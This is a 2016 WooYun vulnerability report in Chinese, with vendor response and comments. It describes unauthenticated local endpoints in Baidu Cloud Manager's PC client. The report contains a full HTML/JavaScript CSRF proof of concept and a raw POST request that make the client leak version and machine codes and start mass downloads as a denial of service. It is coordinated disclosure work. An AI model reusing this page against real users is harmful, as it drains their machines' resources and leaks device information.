百度云管家PC版接口存在未授权访问可DoS

2017年4月15日16:53:57评论483 views字数 213阅读0分42秒阅读模式

摘要

2016-02-25：细节已通知厂商并且等待厂商处理中
2016-02-25：厂商已经确认，细节仅向厂商公开
2016-02-28：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2016-04-20：细节向核心白帽子及相关领域专家公开
2016-04-30：细节向普通白帽子公开
2016-05-10：细节向实习白帽子公开
2016-05-25：细节向公众公开

漏洞概要关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-178485

漏洞标题：百度云管家PC版接口存在未授权访问可DoS

漏洞作者： Fremy

提交时间： 2016-02-25 15:25

公开时间： 2016-05-25 15:50

漏洞类型：设计错误/逻辑缺陷

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：敏感接口缺乏认证

4人收藏

漏洞详情

披露状态：

简要描述：

百度云管家PC 版接口存在未授权访问可以导致本地DoS ..

详细说明：

出现问题的程序YunDetectService.exe :

在启动百度云管家后,它会绑定在本地10000 端口,用来和百度云盘网页版做交互(比如在网页上面下载文件可以选择两种方式:浏览器下载和百度云管家下载,选择用云管家下载则回由浏览器向本地10000 端口发送下载请求)

支持以下的指令:

访问接口:

code 区域

**.**.**.**:10000/guanjia?method=GetVersion
 **.**.**.**:10000/guanjia?method=GetPcCode

上面两个只是信息泄露测试,出现问题的是下面这个指令:

code 区域

DownloadShareItems

也就是说,我们可以构造一个页面CSRF 让百度云管家下载就可以了

PoC :

code 区域

POST 数据包
 URL:
 **.**.**.**:10000/guanjia?method=DownloadSelfOwnItems&uk=1&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528
 Data:
 filelist=opUqZIg7lhaXjq7YJjQV1t65d4G2NZJr6mwXG8IGv3UwlYw5mP0UC2r5sv60rQVNP%2FJADoBMnmhBNIXdLeoH6063Mcllu1I81AKbcTEZvkW079GLbHPnFk3zcxO%2BfWMW5ijSiBHRAj1dwT8C0OtwHucRtzWNP%2FFRgB7vBRMGWAy8wO4NdVHc4GU8Pj5wmE%2FG8lmtqOgMZdLhW749%2F1nay8u0lk%2BLmxY%2F8m8w0yyf6nSJ1dOIIBgqjMPL312OdSXOqDC8G%2BTF31WZ5AkmfrphIrwPQCkY9AFxlwLmRhyvX07h5csqBWBtiTdVzrR5JegZm1hxsub7mgr2O2qBr6ojdvUIFXCqDFrnAGDPtLbSnnqPKTytfGk1sj3mK90mZgAAO4lBuhrqzOHoYxnOpUJGuIoRxy1YIGgz3rM2vPtv%2Fbyg1tzIlqENHjuJQboa6szhNcZj61RGimgS8Av6SdATZcLVhZYQcC5qw5ve7qXn5gzX9bRPaltAde%2FIPvTcKx5AXX9JWUk6fyBqM73s5N5xjaReDNiDgKZctEPiM1N2Ud7gPFc9F7FGmzuTRG%2FS8qcmcEgpAmyO9KhDsOecN42yPvONAMLP3JeBgREIQ869NHNCGWqZN4uu2cCex4z3STOGnHMqGZLlKUSNitgd6PKYqz%2FyQA6ATJ5oQTSF3S3qB%2BtOtzHJZbtSPNQCm3ExGb5FtO%2FRi2xz5xaEVDxKOqQfBkmYq%2FhfAGm5c1lIZmfX91tguT2rpCXLJr3BABmrVCqB6A%2BtlIr65gqQ4MBsbsZb5C%2FBuMkT6lH1Pf0OHvDecdYDZaMDf5n%2BvhIvEELX4GjiSriBSx5Up7UpEUc6DW%2FkhcBmLbCZhceA34PnAPrArNcFCNdTGAsy9EFRudCSGYuXVpSPShcZUx2N9X7qdSPt3xT7dpH5Q8dnkt8FUVBQGQR%2FD6GscwXz9aHkfWUPAcmOYc0PVKxRh6uoQKtrycSnIie3y%2BLviFOgeYgvtZIfXIpJk7yK1EcMlist7567m%2FKQJkYtiRjhfxyZCiL5I4b7N4sUkl6EvdULtAy4LJ%2B7%2BcW8K8fa82Qi9d2Fp2RnXTXAMv4NtvYdEpcH1FJ6bl02AQYzb29VO3sy6fQ6hsPq907TGfe81%2F7T4zOp03vgLPRFNtCBrmMVRyKg1ktVawKciivKm73%2FyrDMnnNS34A6yBLCPIpUUFrTHduc%2F%2FziCe6opE0HgPnM1%2F2%2FIGRScaW%2FC9vwWLiVN0Oad7SJl6RkisEDuaI9mQoiYj%2FqV3%2BQ%2B5jN37TUo9dk3o4Ug17StVVJJ9eUPPlvmRoCythk7pScAZ98off2V1%2FgulVgaE44xtvCHxMsspEMbauK8y0epJVLQGhFscO0G0T0ofno%2BoynZNc%3D

漏洞证明：

完整的PoC 在这(DoS 的原理是让百度云管家同时下载大量文件,资源随便找了两个比较大的来测试),下面有测试URL 地址:

code 区域

<html>
     <script>
         function send_packet(method,url,data) {
             var xml=null;
          if (window.XMLHttpRequest) {
              xml = new XMLHttpRequest();
          } else if (window.ActiveXObject) {
              xml = new ActiveXObject("Microsoft.XMLHTTP");
          }
             xml.open(method, url, false);
          xml.setRequestHeader("Content-type","application/x-www-form-urlencoded");
          xml.send(data);
             return xml.responseText;
        }
          //var url = '**.**.**.**:10000/guanjia?method=DownloadShareItems&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528';
          //**.**.**.**:10000/guanjia?method=DownloadSelfOwnItems&uk=1&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528
          //var data= 'filelist=opUqZIg7lhaXjq7YJjQV1t65d4G2NZJr6mwXG8IGv3UwlYw5mP0UC2r5sv60rQVNP%2FJADoBMnmhBNIXdLeoH6063Mcllu1I81AKbcTEZvkW079GLbHPnFk3zcxO%2BfWMW5ijSiBHRAj1dwT8C0OtwHucRtzWNP%2FFRgB7vBRMGWAy8wO4NdVHc4GU8Pj5wmE%2FG8lmtqOgMZdLhW749%2F1nay8u0lk%2BLmxY%2F8m8w0yyf6nSJ1dOIIBgqjMPL312OdSXOqDC8G%2BTF31WZ5AkmfrphIrwPQCkY9AFxlwLmRhyvX07h5csqBWBtiTdVzrR5JegZm1hxsub7mgr2O2qBr6ojdvUIFXCqDFrnAGDPtLbSnnqPKTytfGk1sj3mK90mZgAAO4lBuhrqzOHoYxnOpUJGuIoRxy1YIGgz3rM2vPtv%2Fbyg1tzIlqENHjuJQboa6szhNcZj61RGimgS8Av6SdATZcLVhZYQcC5qw5ve7qXn5gzX9bRPaltAde%2FIPvTcKx5AXX9JWUk6fyBqM73s5N5xjaReDNiDgKZctEPiM1N2Ud7gPFc9F7FGmzuTRG%2FS8qcmcEgpAmyO9KhDsOecN42yPvONAMLP3JeBgREIQ869NHNCGWqZN4uu2cCex4z3STOGnHMqGZLlKUSNitgd6PKYqz%2FyQA6ATJ5oQTSF3S3qB%2BtOtzHJZbtSPNQCm3ExGb5FtO%2FRi2xz5xaEVDxKOqQfBkmYq%2FhfAGm5c1lIZmfX91tguT2rpCXLJr3BABmrVCqB6A%2BtlIr65gqQ4MBsbsZb5C%2FBuMkT6lH1Pf0OHvDecdYDZaMDf5n%2BvhIvEELX4GjiSriBSx5Up7UpEUc6DW%2FkhcBmLbCZhceA34PnAPrArNcFCNdTGAsy9EFRudCSGYuXVpSPShcZUx2N9X7qdSPt3xT7dpH5Q8dnkt8FUVBQGQR%2FD6GscwXz9aHkfWUPAcmOYc0PVKxRh6uoQKtrycSnIie3y%2BLviFOgeYgvtZIfXIpJk7yK1EcMlist7567m%2FKQJkYtiRjhfxyZCiL5I4b7N4sUkl6EvdULtAy4LJ%2B7%2BcW8K8fa82Qi9d2Fp2RnXTXAMv4NtvYdEpcH1FJ6bl02AQYzb29VO3sy6fQ6hsPq907TGfe81%2F7T4zOp03vgLPRFNtCBrmMVRyKg1ktVawKciivKm73%2FyrDMnnNS34A6yBLCPIpUUFrTHduc%2F%2FziCe6opE0HgPnM1%2F2%2FIGRScaW%2FC9vwWLiVN0Oad7SJl6RkisEDuaI9mQoiYj%2FqV3%2BQ%2B5jN37TUo9dk3o4Ug17StVVJJ9eUPPlvmRoCythk7pScAZ98off2V1%2FgulVgaE44xtvCHxMsspEMbauK8y0epJVLQGhFscO0G0T0ofno%2BoynZNc%3D';
          //'[{"fs_id":54712922114815,"app_id":"250528","parent_path":"%2F%E5%AE%89%E8%A3%85%E5%8C%85%E4%B8%93%E5%8C%BA%2FPhotoshop%2FPhotoshop%20CS6%E7%BB%BF%E8%89%B2%E7%B2%BE%E7%AE%80%E7%89%88","server_filename":"Photoshop CS6/u7eff/u8272/u7cbe/u7b80/u7248.zip","size":130926971,"server_mtime":1446967394,"server_ctime":1415285685,"local_mtime":1415285685,"local_ctime":1415285685,"isdir":0,"isdelete":"0","status":"0","category":6,"share":"0","path_md5":"18434066479774873353","delete_fs_id":"0","extent_int3":"0","extent_tinyint1":"0","extent_tinyint2":"0","extent_tinyint3":"0","extent_tinyint4":"0","path":"///u5b89/u88c5/u5305/u4e13/u533a//Photoshop//Photoshop CS6/u7eff/u8272/u7cbe/u7b80/u7248//Photoshop CS6/u7eff/u8272/u7cbe/u7b80/u7248.zip","root_ns":544104072,"md5":"6f9b03aea552d351461fecd1343a4513","file_key":""}]';
          //filelist=%7B%22filelist%22%3A%5B%7B%22isdir%22%3A%220%22%2C%22md5%22%3A%22584ba07ed49ee9fb1866e1efb6eb9dae%22%2C%22server_path%22%3A%22%2FI9500XXUHOD4_lishuo.zip%22%2C%22size%22%3A%221135731549%22%2C%22shareid%22%3A%22%22%2C%22uk%22%3A%22%22%2C%22token%22%3A%22%22%2C%22fs_id%22%3A430914538807085%2C%22link%22%3A%22http%3A%2F%2F**.**.**.**%2Ffile%2F584ba07ed49ee9fb1866e1efb6eb9dae%3Ffid%3D840862791-250528-430914538807085%26time%3D1456305204%26rt%3Dpr%26sign%3DFDTAERVCY-DCb740ccc5511e5e8fedcff06b081203-P4ffSjmp7%252FjVVG68d87oai4QDNU%253D%26expires%3D8h%26chkv%3D1%26chkbd%3D1%26chkpc%3Det%26dp-logid%3D1269056621223660851%26dp-callid%3D0%26r%3D440109364%22%7D%5D%7D
          
         function get_version() {
             output('baidu_guanjia_version',send_packet('GET','**.**.**.**:10000/guanjia?method=GetVersion',null));
         }
         function get_pc_code() {
             output('baidu_guanjia_pc_code',send_packet('GET','**.**.**.**:10000/guanjia?method=GetPcCode',null));
         }
         function download_file(file_url,file_data) {
             output('baidu_guanjia_version',send_packet('POST',file_url,file_data));
         }
         function output(element,data) {
             document.write(data+'<br/>');
         }
         get_version();
         get_pc_code();
         download_file('**.**.**.**:10000/guanjia?method=DownloadShareItems&uk=0&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528','filelist=opUqZIg7lhaXjq7YJjQV1t65d4G2NZJr6mwXG8IGv3UwlYw5mP0UC2r5sv60rQVNP%2FJADoBMnmhBNIXdLeoH6063Mcllu1I81AKbcTEZvkW079GLbHPnFk3zcxO%2BfWMW5ijSiBHRAj1dwT8C0OtwHucRtzWNP%2FFRgB7vBRMGWAy8wO4NdVHc4GU8Pj5wmE%2FG8lmtqOgMZdLhW749%2F1nay8u0lk%2BLmxY%2F8m8w0yyf6nSJ1dOIIBgqjMPL312OdSXOqDC8G%2BTF31WZ5AkmfrphIrwPQCkY9AFxlwLmRhyvX07h5csqBWBtiTdVzrR5JegZm1hxsub7mgr2O2qBr6ojdvUIFXCqDFrnAGDPtLbSnnqPKTytfGk1sj3mK90mZgAAO4lBuhrqzOHoYxnOpUJGuIoRxy1YIGgz3rM2vPtv%2Fbyg1tzIlqENHjuJQboa6szhNcZj61RGimgS8Av6SdATZcLVhZYQcC5qw5ve7qXn5gzX9bRPaltAde%2FIPvTcKx5AXX9JWUk6fyBqM73s5N5xjaReDNiDgKZctEPiM1N2Ud7gPFc9F7FGmzuTRG%2FS8qcmcEgpAmyO9KhDsOecN42yPvONAMLP3JeBgREIQ869NHNCGWqZN4uu2cCex4z3STOGnHMqGZLlKUSNitgd6PKYqz%2FyQA6ATJ5oQTSF3S3qB%2BtOtzHJZbtSPNQCm3ExGb5FtO%2FRi2xz5xaEVDxKOqQfBkmYq%2FhfAGm5c1lIZmfX91tguT2rpCXLJr3BABmrVCqB6A%2BtlIr65gqQ4MBsbsZb5C%2FBuMkT6lH1Pf0OHvDecdYDZaMDf5n%2BvhIvEELX4GjiSriBSx5Up7UpEUc6DW%2FkhcBmLbCZhceA34PnAPrArNcFCNdTGAsy9EFRudCSGYuXVpSPShcZUx2N9X7qdSPt3xT7dpH5Q8dnkt8FUVBQGQR%2FD6GscwXz9aHkfWUPAcmOYc0PVKxRh6uoQKtrycSnIie3y%2BLviFOgeYgvtZIfXIpJk7yK1EcMlist7567m%2FKQJkYtiRjhfxyZCiL5I4b7N4sUkl6EvdULtAy4LJ%2B7%2BcW8K8fa82Qi9d2Fp2RnXTXAMv4NtvYdEpcH1FJ6bl02AQYzb29VO3sy6fQ6hsPq907TGfe81%2F7T4zOp03vgLPRFNtCBrmMVRyKg1ktVawKciivKm73%2FyrDMnnNS34A6yBLCPIpUUFrTHduc%2F%2FziCe6opE0HgPnM1%2F2%2FIGRScaW%2FC9vwWLiVN0Oad7SJl6RkisEDuaI9mQoiYj%2FqV3%2BQ%2B5jN37TUo9dk3o4Ug17StVVJJ9eUPPlvmRoCythk7pScAZ98off2V1%2FgulVgaE44xtvCHxMsspEMbauK8y0epJVLQGhFscO0G0T0ofno%2BoynZNc%3D');
         download_file('**.**.**.**:10000/guanjia?method=DownloadShareItems&uk=0&checkuser=0&bdstoken=da81a7aa87cb139bd9b82555683fe63b&channel=chunlei&clienttype=0&web=1&app_id=250528','filelist=opUqZIg7lhabowADkR56umGTsXSI75FMArOoRAftdZd27DTXgKyMHgneFM%2FvrEy9i0as29lDGnMe9a0PdMJRPSxvlJ4VO0zZmVrmtVwO%2B8g0XSm24X2gFUaUxowrlKW%2BmDF5Im4cQUWjQYdpJQVTEQ7eAEa5PMD5KU%2FDA%2Bzh%2FIHo5W6z10EpZmIsbDh7vNnyBVb1NiSdcZIg01iNDlbNB9ZFZ7mnkqt6Dz1Y0WX%2B9Gr4BdS2VC%2BH9jQPYRVlTTpa8CND0qJXhu4hcTAIRqFvRw8jnI120%2Bi0PsiaCN4BUISNnqzo5xBb7%2Fe6Hn6BtxQtQkJRvIBe9X5tF4DPFOiPiYwLfCRnT0Q%2BDv5XR3IZu3Ie8LPzx2HY7KaS93WG3O6MgmKbOs2q4ch2LMB8774CHqjWT4VltDd70gSDVb%2FBG8%2Bmkvd1htzujPm63wsjcfRnvpwOZo4Fuf4lar%2FpQJMWO4SqMJ4kNnhCfcrlkrkNwA8yfK0iUX8R34GRz3XY45iKltP9oK5MXwFIYXPVo3R5zGFEyXhq%2FykNjuf47ng9LMu1Qbdx2oCeaNtjLSWAJmorII3YNxnkYoR%2Bbyk058Tp%2BnN4%2BmbRAUp7o59y%2FJrQ6TOqocneFJP%2BZv16dbxgYR6S%2Fcgsuiyyq52z%2FrRCvNMMYb0a5Sc8bb9v7WIJaDNB%2FpX8uPlDt4oG2aJCwx1HfUfTPzfz7iQeQRCMaZVEFqGKFSX1oe8%2FbXq49f3MNstg7rTO%2F2RMDJWK1TJpVBZoe1qQSXpT06DAdTUmE4MasOwiGSVf2pNl3EZav1b2%2FS16OG9OjX0h%2FKRQSH9b9aXxvhGaZC6eEifNsgrDthBz54Y6sd2Ea04AnTY7GyQT2GYXqsX38UEd0nnwU%2BF2dFTU9BBnOAc6tGmWPcHeY3Tl%2FdWnoeiX4h8cXGNvOdSMBqLcs2M2Ez4LhAueEXjG%2FcsThBbOxSQlltgsCUfdp2Rl87kwYHa5u3f%2Ba8eX%2FFsJfbHQhKZolVs%2BWopMjoEbP2au2SHr%2F%2FPndqc18lm%2F%2BZrrhM7fP1na6xDnGWEyQhkAIh5xV3qGsoWp5g%2BCB5X2TrmNymB2Gs16%2BzXXlnibj1VvSS8xacHr7%2FmTpw8RPFnwbjLvS8KahqfAh8xisJJvK3bkx6u9kRQh0ZFuj%2FUG9faYIPArgK4PCCvOlGUr5Wpkc8zmj89jjpRyHcQdCpVtF9U4dmHe8027VFpDeZ%2Bo8Y0rdmdHHXAHLM83YjV1%2B7N6H40Upexoe2lPxtd5RTfNGmyWd9%2BqJFuiJnrX0u80fi8kVLqHmXN1InIBZC9L');
     </script>
     <body>
     </body>
 </html>

测试URL (麻烦帮我打个码):

code 区域

http://**.**.**.**/baidu_Cloud_CSRF_download.html

PoC 效果

没有执行测试URL 之前:

执行测试URL 之后:

修复方案：

版权声明：转载请注明来源 Fremy@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-02-25 15:45

厂商回复：

感谢对百度安全的关注

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-02-25 15:35 | 晓庄 ( 路人 | Rank:29 漏洞数:7 | Make money.)

2

前排

1# 回复此人
2016-02-28 17:54 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔！)

2

这个是什么鬼。

2# 回复此人
2016-05-25 16:28 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

0

懵逼。。

3# 回复此人
2016-05-25 23:11 | illl ( 实习白帽子 | Rank:48 漏洞数:19 | Miss a person, that person will not have...)

0

输入网址直接下载

4# 回复此人
2016-05-25 23:56 | 羊大仙 ( 路人 | Rank:15 漏洞数:5 | 码字民工，说话，写字，漫画，喝咖啡，听音...)

0

为什么还没有提醒我升级呢？

5# 回复此人

漏洞概要 关注数(18) 关注此漏洞

缺陷编号： WooYun-2016-178485

漏洞标题： 百度云管家PC版接口存在未授权访问可DoS

相关厂商： 百度

漏洞作者： Fremy

提交时间： 2016-02-25 15:25

公开时间： 2016-05-25 15:50

漏洞类型： 设计错误/逻辑缺陷

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 敏感接口缺乏认证

4人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Fremy@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(18) 关注此漏洞

漏洞标题：百度云管家PC版接口存在未授权访问可DoS

相关厂商：百度

漏洞类型：设计错误/逻辑缺陷

危害等级：高

漏洞状态：厂商已经确认

Tags标签：敏感接口缺乏认证

漏洞评价(共0人评价):

登陆后才能进行评分